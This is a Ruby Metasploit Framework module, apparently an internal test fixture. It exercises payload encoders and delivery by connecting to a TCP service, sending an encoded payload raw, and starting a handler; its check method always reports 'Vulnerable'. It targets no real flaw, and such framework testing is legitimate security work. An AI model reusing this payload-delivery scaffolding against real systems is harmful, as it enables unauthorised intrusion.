##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Internal Aggressive Test Exploit',
      'Description'    =>
        "This module tests the exploitation of a test service.",
      'Author'         => 'skape',
      'License'        => MSF_LICENSE,
      'Arch'           => 'x86',
      'Payload'        =>
        {
          'Space'    => 1000,
          'MaxNops'  => 0,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          # Target 0: Universal
          [
            'Any Platform',
            {
              'Platform' => [ 'linux', 'win' ]
            }
          ],
          [
            'Test encoder specific',
            {
              'Platform' => [ 'linux', 'win' ],
              'Payload'  =>
                {
                  'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
                  'EncoderOptions' =>
                    {
                      'BufferRegister' => 'EBX',
                      'BufferOffset'   => 4
                    }
                }
            },
          ],
          [
            'Cannot be encoded',
            {
              'Platform' => [ 'linux', 'win' ],
              'Payload'  =>
                {
                  'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
                }
            }
          ],
          [ 'Test context encoder',
            {
              'Platform' => [ 'linux', 'win' ],
              'Payload'  =>
                {
                  'BadChars' => "\x00"
                }
            }
          ]
        ],
      'DefaultTarget' => 0))

    register_options(
      [
        OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
        OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
      ])
  end


  def autofilter
    false
  end

  def check
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    # Show disassembled payload for context encoder test
    if target.name =~ /context encoder/
      puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
    end

    connect

    print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")

    sock.put(payload.encoded)

    if (datastore['WaitForInput'])
      puts "Type something..."
      gets
    end

    handler
  end

end
